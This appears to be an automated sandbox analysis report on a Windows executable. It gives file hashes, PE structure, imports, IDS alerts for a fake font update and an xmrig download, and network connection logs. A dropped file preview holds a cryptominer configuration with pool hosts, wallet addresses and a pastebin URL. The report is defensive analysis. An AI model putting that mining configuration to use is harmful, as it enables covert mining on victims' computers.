                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe
                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):344
                                                                                                                                                                        Entropy (8bit):5.688678537167479
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6:DiYgE/ovKDMcPmriYgE/ovKDMcBCrT5fhXGT2QSBa5ydXnzAiGUlQPoy68f1KAK3:uwgyXmGwgyoH55GT2Qtyc3n1KAU
                                                                                                                                                                        MD5:1A4E05716C2A8B7A5F34172178340305
                                                                                                                                                                        SHA1:2E1A747A57E99B7FA2F691568104C5431F79A849
                                                                                                                                                                        SHA-256:FB42753CE0F515D7E4BF6B3C86895CC14FC59BE6A1A81D429A34B88F48286173
                                                                                                                                                                        SHA-512:41D18BDA9117C3F0162F5ACA3C63FE139A38ED4A419619992C258CF1107BF4C2D0EC9B9CFB402D19347FE4C50CFEA0ED6FBD4602781027B725463C613E0837CA
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:ETCHASH..etc.2miners.com:1010..0x7fe2496e102A4E43617eb2E95B5d1D1C3f6Db972..ETCHASH..etc.2miners.com:1010..0x7fe2496e102A4E43617eb2E95B5d1D1C3f6Db972..XMR..pool.hashvault.pro:443..ZEPHYR3c6xGj8D5oP4tzKQbPn2dNdse6aPRWxNBiwBFrg7RFN4jf1cqgj5qdR9Wdru44g2FATJHHH38oFDTH6krgKntSzLc5Csy3t..Dnepr..F(Ff4f67h((jgf..cp..https://pastebin.com/raw/YpJeSRBC..
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1835008
                                                                                                                                                                        Entropy (8bit):4.376698841488419
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6144:5jVfpi6ceLP/9skLmb0ByWWSPtaJG8nAge3nONQqZaK2FIeC/7ZcX1OZC:RV1ryWWI/ONQqYMjyFEC
                                                                                                                                                                        MD5:A0F81277C8F45A06DC2EC922D72027A4
                                                                                                                                                                        SHA1:D34B4BFD4DB4CD4580CBBD0B1DF1DEB89C783E6C
                                                                                                                                                                        SHA-256:DE14545A3BB3E8D6D0AA2B52AB1FB2995B400E98E77CDA20384D0BE27C99A3CA
                                                                                                                                                                        SHA-512:0F63CBE3BD9175FE6AABF90A9A7DBC217F80938006B4099ACAD7F5559CA48C17401C28246EFDA01B4B09E44D144548151725ECA821FA78FC125F83914EB2826B
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:regfE...E....\.Z.................... ....@......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmNW..e.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):24576
                                                                                                                                                                        Entropy (8bit):3.8490329332863964
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:VO9o+iKioyyQPRI2oPFdk8DlS1ysk8meJ/dwhP:VOZiDoyFPRI3PI8Ds1ysk8HeP
                                                                                                                                                                        MD5:FD8610034E5BDA92D92635FC7D7DBFBF
                                                                                                                                                                        SHA1:C3F36BCB47094AF2B0BC374552FCFC6B82EB321F
                                                                                                                                                                        SHA-256:ECE238D333D8EFD54E6A0BAFE448A7A4FAD742120A828801F3681933A208479C
                                                                                                                                                                        SHA-512:9BD2E051F18410CD6442EAE74B3C9BE60EA039F1C941398F830ED785BA041ABB5DB8A3A1DD5AD26B1406E29E6CDA5F9574C10FBC8AB01113F3E0AF4058883637
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:regfD...D....\.Z.................... ....@......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmNW..e.................................................................................................................................................................................................................................................................................................................................................HvLE.^......D....@......">.9v.k/1..........................0..hbin.................\.Z............nk,..\.Z....................h...................................<.......&...{11517B7C-E79D-4e20-961B-75A811715ADD}..`...sk..........B...........\...l.............H.........?...................?...................?........... ... ........... ... ...................$.N..........vk..4...`...........CreatingCommand.....O.n.e.D.r.i.v.e.S.e.t.u.p...e.x.e. ./.s.i.l.e.n.t.......vk..<.......
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe
                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):344
                                                                                                                                                                        Entropy (8bit):5.688678537167479
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6:DiYgE/ovKDMcPmriYgE/ovKDMcBCrT5fhXGT2QSBa5ydXnzAiGUlQPoy68f1KAK3:uwgyXmGwgyoH55GT2Qtyc3n1KAU
                                                                                                                                                                        MD5:1A4E05716C2A8B7A5F34172178340305
                                                                                                                                                                        SHA1:2E1A747A57E99B7FA2F691568104C5431F79A849
                                                                                                                                                                        SHA-256:FB42753CE0F515D7E4BF6B3C86895CC14FC59BE6A1A81D429A34B88F48286173
                                                                                                                                                                        SHA-512:41D18BDA9117C3F0162F5ACA3C63FE139A38ED4A419619992C258CF1107BF4C2D0EC9B9CFB402D19347FE4C50CFEA0ED6FBD4602781027B725463C613E0837CA
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:ETCHASH..etc.2miners.com:1010..0x7fe2496e102A4E43617eb2E95B5d1D1C3f6Db972..ETCHASH..etc.2miners.com:1010..0x7fe2496e102A4E43617eb2E95B5d1D1C3f6Db972..XMR..pool.hashvault.pro:443..ZEPHYR3c6xGj8D5oP4tzKQbPn2dNdse6aPRWxNBiwBFrg7RFN4jf1cqgj5qdR9Wdru44g2FATJHHH38oFDTH6krgKntSzLc5Csy3t..Dnepr..F(Ff4f67h((jgf..cp..https://pastebin.com/raw/YpJeSRBC..
                                                                                                                                                                        File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                        Entropy (8bit):7.686476863915138
                                                                                                                                                                        TrID:
                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                        File name:setupx 1.exe1.exe
                                                                                                                                                                        File size:1'360'384 bytes
                                                                                                                                                                        MD5:d3dfeb11e332ea228567f9f4ebafef51
                                                                                                                                                                        SHA1:86ab8368a72f9490c175de5032c2b9f2a219f0ee
                                                                                                                                                                        SHA256:79188b44c38f4fabdb8868d0fad3ba1b297b627e8a7d2438fcf7edbaf4c2a6c8
                                                                                                                                                                        SHA512:c6f8023785f9b32fa27cb45dcfe4468552c71b1cea8b807ae65987cfcc70a7d7e250770e75c07f28b097fbd05d1ddb32bc818ed1c00f526486414327a1772569
                                                                                                                                                                        SSDEEP:24576:6Ai/c6dNtEWZ4B+UsxoxbzmXFHaeclEX3fq6F+cONK1B3rRHaeclEX3fq6F+cON2:k0qNtnKB+UsxoxbzYF6TyX31F+6zrR6I
                                                                                                                                                                        TLSH:2155E07270C1C073F642A5B23598E3B5546BF672DE2E0FC7A2B4E7749148AC117AA12F
                                                                                                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......g..........................................@.......................................@.................................06..<..
                                                                                                                                                                        Icon Hash:90cececece8e8eb0
                                                                                                                                                                        Entrypoint:0x46e682
                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                        Digitally signed:true
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        Subsystem:windows cui
                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                        Time Stamp:0x67D09BB6 [Tue Mar 11 20:23:18 2025 UTC]
                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                        File Version Major:6
                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                        Import Hash:d462aa757f68629e41b3df6e6d4c6a3c
                                                                                                                                                                        Signature Valid:
                                                                                                                                                                        Signature Issuer:
                                                                                                                                                                        Signature Validation Error:
                                                                                                                                                                        Error Number:
                                                                                                                                                                        Not Before, Not After
                                                                                                                                                                          Subject Chain
                                                                                                                                                                            Version:
                                                                                                                                                                            Thumbprint MD5:
                                                                                                                                                                            Thumbprint SHA-1:
                                                                                                                                                                            Thumbprint SHA-256:
                                                                                                                                                                            Serial:
                                                                                                                                                                            Instruction
                                                                                                                                                                            call 00007F1CA4F722AAh
                                                                                                                                                                            jmp 00007F1CA4F72119h
                                                                                                                                                                            mov ecx, dword ptr [00496840h]
                                                                                                                                                                            push esi
                                                                                                                                                                            push edi
                                                                                                                                                                            mov edi, BB40E64Eh
                                                                                                                                                                            mov esi, FFFF0000h
                                                                                                                                                                            cmp ecx, edi
                                                                                                                                                                            je 00007F1CA4F722A6h
                                                                                                                                                                            test esi, ecx
                                                                                                                                                                            jne 00007F1CA4F722C8h
                                                                                                                                                                            call 00007F1CA4F722D1h
                                                                                                                                                                            mov ecx, eax
                                                                                                                                                                            cmp ecx, edi
                                                                                                                                                                            jne 00007F1CA4F722A9h
                                                                                                                                                                            mov ecx, BB40E64Fh
                                                                                                                                                                            jmp 00007F1CA4F722B0h
                                                                                                                                                                            test esi, ecx
                                                                                                                                                                            jne 00007F1CA4F722ACh
                                                                                                                                                                            or eax, 00004711h
                                                                                                                                                                            shl eax, 10h
                                                                                                                                                                            or ecx, eax
                                                                                                                                                                            mov dword ptr [00496840h], ecx
                                                                                                                                                                            not ecx
                                                                                                                                                                            pop edi
                                                                                                                                                                            mov dword ptr [00496880h], ecx
                                                                                                                                                                            pop esi
                                                                                                                                                                            ret
                                                                                                                                                                            push ebp
                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                            sub esp, 14h
                                                                                                                                                                            lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                            xorps xmm0, xmm0
                                                                                                                                                                            push eax
                                                                                                                                                                            movlpd qword ptr [ebp-0Ch], xmm0
                                                                                                                                                                            call dword ptr [00493864h]
                                                                                                                                                                            mov eax, dword ptr [ebp-08h]
                                                                                                                                                                            xor eax, dword ptr [ebp-0Ch]
                                                                                                                                                                            mov dword ptr [ebp-04h], eax
                                                                                                                                                                            call dword ptr [00493824h]
                                                                                                                                                                            xor dword ptr [ebp-04h], eax
                                                                                                                                                                            call dword ptr [00493820h]
                                                                                                                                                                            xor dword ptr [ebp-04h], eax
                                                                                                                                                                            lea eax, dword ptr [ebp-14h]
                                                                                                                                                                            push eax
                                                                                                                                                                            call dword ptr [004938ACh]
                                                                                                                                                                            mov eax, dword ptr [ebp-10h]
                                                                                                                                                                            lea ecx, dword ptr [ebp-04h]
                                                                                                                                                                            xor eax, dword ptr [ebp-14h]
                                                                                                                                                                            xor eax, dword ptr [ebp-04h]
                                                                                                                                                                            xor eax, ecx
                                                                                                                                                                            leave
                                                                                                                                                                            ret
                                                                                                                                                                            mov eax, 00004000h
                                                                                                                                                                            ret
                                                                                                                                                                            push 00498490h
                                                                                                                                                                            call dword ptr [00493884h]
                                                                                                                                                                            ret
                                                                                                                                                                            push 00030000h
                                                                                                                                                                            push 00010000h
                                                                                                                                                                            push 00000000h
                                                                                                                                                                            call 00007F1CA4F78DF5h
                                                                                                                                                                            add esp, 0Ch
                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x936300x3c.rdata
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x99e000x4540
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x9a0000x435c.reloc
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x8fb280x18.rdata
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x8bf980xc0.rdata
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x937c00x154.rdata
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                            .text0x10000x89ad00x89c000bd698a1f44cc91b018d0fe5240109abFalse0.5286942774500908data7.09207256696417IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                            .rdata0x8b0000xa0340xa200383899a836f6650ba73e1556e24d0e62False0.4230806327160494data4.888147649186249IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                            .data0x960000x2c5c0x1600233e04c81724f6e0f553a5dbb15f0a09False0.4073153409090909data4.744840434225013IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                            .tls0x990000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                            .reloc0x9a0000x435c0x4400b181df1a2af7bbd01ea74e454a21e7baFalse0.7916475183823529data6.714823432652306IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                            .bss0x9f0000x56e000x56e008ad31acc19ff527432c0a659183e3e93False1.0003259892086331OpenPGP Public Key7.9995877564491815IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                            .bss0xf60000x56e000x56e008ad31acc19ff527432c0a659183e3e93False1.0003259892086331OpenPGP Public Key7.9995877564491815IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                            DLLImport
                                                                                                                                                                            KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeConsole, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEndOfFile, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                                                                                                            ole32.dllOleDraw
                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                            2025-03-13T13:33:37.859535+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849682188.114.97.3443TCP
                                                                                                                                                                            2025-03-13T13:33:40.505685+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849684188.114.97.3443TCP
                                                                                                                                                                            2025-03-13T13:33:42.699100+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849688188.114.97.3443TCP
                                                                                                                                                                            2025-03-13T13:33:45.501672+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849690188.114.97.3443TCP
                                                                                                                                                                            2025-03-13T13:33:48.410028+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849691188.114.97.3443TCP
                                                                                                                                                                            2025-03-13T13:33:50.933221+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849692188.114.97.3443TCP
                                                                                                                                                                            2025-03-13T13:33:55.415611+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849694188.114.97.3443TCP
                                                                                                                                                                            2025-03-13T13:34:03.475012+01002829056ETPRO MALWARE Observed Request for xmrig.exe in - Coinminer Download2192.168.2.849701185.215.113.5180TCP
                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                            Mar 13, 2025 13:33:36.503892899 CET49682443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:36.503935099 CET44349682188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:36.504018068 CET49682443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:36.508591890 CET49682443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:36.508620024 CET44349682188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:37.859371901 CET44349682188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:37.859534979 CET49682443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:37.884291887 CET49682443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:37.884325027 CET44349682188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:37.884867907 CET44349682188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:37.929419994 CET49682443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:38.323811054 CET49682443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:38.323843002 CET49682443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:38.324038029 CET44349682188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:38.993083000 CET44349682188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:38.993156910 CET44349682188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:38.993190050 CET44349682188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:38.993207932 CET49682443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:38.993227959 CET44349682188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:38.993266106 CET49682443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:38.993278980 CET44349682188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:38.993328094 CET44349682188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:38.993360996 CET49682443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:38.993365049 CET44349682188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:38.993379116 CET44349682188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:38.993426085 CET49682443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:38.993436098 CET44349682188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:38.999442101 CET44349682188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:38.999501944 CET49682443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:38.999519110 CET44349682188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:39.054404974 CET49682443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:39.078552008 CET44349682188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:39.132531881 CET49682443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:39.132580042 CET44349682188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:39.132661104 CET44349682188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:39.132694960 CET49682443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:39.133646965 CET49682443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:39.133666992 CET44349682188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:39.357992887 CET49684443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:39.358108044 CET44349684188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:39.358194113 CET49684443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:39.358825922 CET49684443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:39.358869076 CET44349684188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:40.505580902 CET44349684188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:40.505685091 CET49684443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:40.507075071 CET49684443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:40.507111073 CET44349684188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:40.507376909 CET44349684188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:40.508852005 CET49684443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:40.509037018 CET49684443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:40.509077072 CET44349684188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:41.374535084 CET44349684188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:41.374825001 CET49684443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:41.545061111 CET49688443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:41.545093060 CET44349688188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:41.545162916 CET49688443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:41.545511007 CET49688443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:41.545526981 CET44349688188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:42.699004889 CET44349688188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:42.699100018 CET49688443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:42.700373888 CET49688443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:42.700383902 CET44349688188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:42.700634956 CET44349688188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:42.711724043 CET49688443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:42.712039948 CET49688443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:42.712071896 CET44349688188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:42.712340117 CET49688443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:42.760329008 CET44349688188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:43.558721066 CET44349688188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:43.558862925 CET44349688188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:43.558938980 CET49688443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:43.584532022 CET49688443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:43.584559917 CET44349688188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:44.110673904 CET49690443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:44.110726118 CET44349690188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:44.110819101 CET49690443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:44.111310005 CET49690443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:44.111329079 CET44349690188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:45.501537085 CET44349690188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:45.501672029 CET49690443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:45.503513098 CET49690443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:45.503529072 CET44349690188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:45.503782988 CET44349690188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:45.505224943 CET49690443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:45.505369902 CET49690443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:45.505402088 CET44349690188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:45.505959034 CET49690443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:45.505970001 CET44349690188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:46.441056967 CET44349690188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:46.448332071 CET49690443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:47.077847004 CET49691443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:47.077897072 CET44349691188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:47.078047037 CET49691443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:47.078306913 CET49691443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:47.078320026 CET44349691188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:48.409594059 CET44349691188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:48.410027981 CET49691443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:48.411345005 CET49691443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:48.411355019 CET44349691188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:48.411604881 CET44349691188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:48.413048029 CET49691443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:48.413170099 CET49691443192.168.2.8188.114.97.3
                                                                                                                                                                            Mar 13, 2025 13:33:48.413189888 CET44349691188.114.97.3192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:33:49.294042110 CET44349691188.114.97.3192.168.2.8
